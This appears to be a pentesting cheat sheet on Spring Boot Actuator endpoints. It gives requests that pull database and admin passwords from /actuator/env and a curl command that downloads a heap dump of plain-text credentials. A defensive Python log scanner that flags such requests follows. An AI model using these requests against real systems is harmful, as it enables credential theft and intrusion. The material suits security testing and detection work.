
Spring-Boot

Open-source Java framework used for Spring-based applications

Read this article from Wiz

Actuators

Actuators are management endpoints; these are the most important ones for you:

/actuator/health and /actuator/info are publicly available. The sensitive ones are:

  • /dump or /threaddump - Exposes data in memory.

  • /trace or /httptrace - Shows recent HTTP requests.

  • /logfile - Exposes application log files.

  • /env or /actuator/env - Reveals environment variables, configuration properties, and system settings.

  • /mappings - Shows all URL mappings and endpoints.

  • /heapdump - Downloads a heap dump file containing all objects in memory.

  • /shutdown - Allows remote shutdown of the application.

  • /restart - Allows remote restart of the application.

SecLists has a great wordlist: Javascript-Spring-Boot

Querying tricks

Using Property Patterns

When you see patterns like:

spring.datasource.url
spring.datasource.username
spring.datasource.password

you can use these patterns in two ways:

  • Direct access: /actuator/env/spring.datasource.password

  • Prefix queries: /actuator/configprops/spring.datasource

Environment Variable

Spring Boot automatically maps environment variables to its property format following these rules:

  • Uppercase letters

  • Replace dots with underscores

  • Replace hyphens with underscores

  • Remove special characters

You can query these directly:

/actuator/env/SPRING_DATASOURCE_PASSWORD

Enumeration

Configuration Discovery with /actuator/env

Look for interesting patterns:

  • Database properties (spring.datasource.*)

  • Security properties (spring.security.*)

  • Cloud properties (spring.cloud.*)

Try prefix queries to see related properties:

GET /actuator/configprops/spring.datasource

Finding Database Credentials

GET /actuator/env/spring.datasource.url
GET /actuator/env/spring.datasource.username
GET /actuator/env/spring.datasource.password

Finding Custom Application Properties

GET /actuator/env/app.admin.username
GET /actuator/env/app.admin.password

If the application uses Spring Cloud, look for:

"spring.cloud.config.uri"
"spring.cloud.config.username"
"spring.cloud.config.password"

Try different content types

application/vnd.spring-boot.actuator.v3+json
application/json

CVE-2025-48927 - /heapdump exposed - Initialization of a Resource with an Insecure Default

Download a ~150MB file containing plain-text usernames and passwords and much more :)

curl -X GET http://IP/actuator/heapdump

Use VisualVM to look at the dump comfortably.
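As an added example (not from the original page, and not Spring code), here is the log-side check a defender would run to see whether the endpoints listed above and the /actuator/env queries described in the enumeration sections were hit, and whether they actually answered. The access-log lines and IP addresses are constructed, and the severity labels are my own triage labels, not anything Spring defines.

```python
import re
from urllib.parse import urlsplit

# Sensitive actuator endpoints from the list above; severity labels are my own triage labels.
SENSITIVE = {
    "heapdump": "critical", "env": "critical", "configprops": "critical",
    "shutdown": "critical", "restart": "critical", "logfile": "high",
    "httptrace": "high", "trace": "high", "threaddump": "high",
    "dump": "high", "mappings": "medium",
}

# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_path(target):
    """(endpoint, severity) if target hits a sensitive actuator endpoint, else None.
    Handles /actuator/<name>, bare /<name> (Boot 1.x), query strings and sub-paths."""
    parts = [p for p in urlsplit(target).path.split("/") if p]
    if parts and parts[0].lower() == "actuator":
        parts = parts[1:]
    if not parts:
        return None
    name = parts[0].lower()
    severity = SENSITIVE.get(name)
    return (name, severity) if severity else None

def scan_log(lines):
    """One finding per sensitive-actuator request; 'exposed' is True only on a 2xx."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        hit = classify_path(m["target"]) if m else None
        if hit is None:
            continue  # not Common Log Format, or not a sensitive endpoint
        status = int(m["status"])
        findings.append({"ip": m["ip"], "time": m["ts"], "endpoint": hit[0],
                         "severity": hit[1], "target": m["target"],
                         "status": status, "exposed": 200 <= status < 300})
    return findings

# Constructed sample access-log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2025:10:01:02 +0000] "GET /actuator/health HTTP/1.1" 200 15',
    '203.0.113.7 - - [10/Jan/2025:10:01:05 +0000] "GET /actuator/env/spring.datasource.password HTTP/1.1" 200 211',
    '203.0.113.7 - - [10/Jan/2025:10:01:09 +0000] "GET /actuator/heapdump HTTP/1.1" 200 157286400',
    '198.51.100.4 - - [10/Jan/2025:10:02:00 +0000] "GET /heapdump?x=1 HTTP/1.1" 403 0',
    '198.51.100.4 - - [10/Jan/2025:10:02:03 +0000] "POST /actuator/shutdown HTTP/1.1" 404 0',
    '192.0.2.9 - - [10/Jan/2025:10:03:00 +0000] "GET /api/users HTTP/1.1" 200 500',
]
```

On the sample above, `scan_log(SAMPLE_LOG)` returns four findings: two real exposures (env and heapdump answered 200) and two blocked probes (403 and 404) that still tell you someone is looking.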
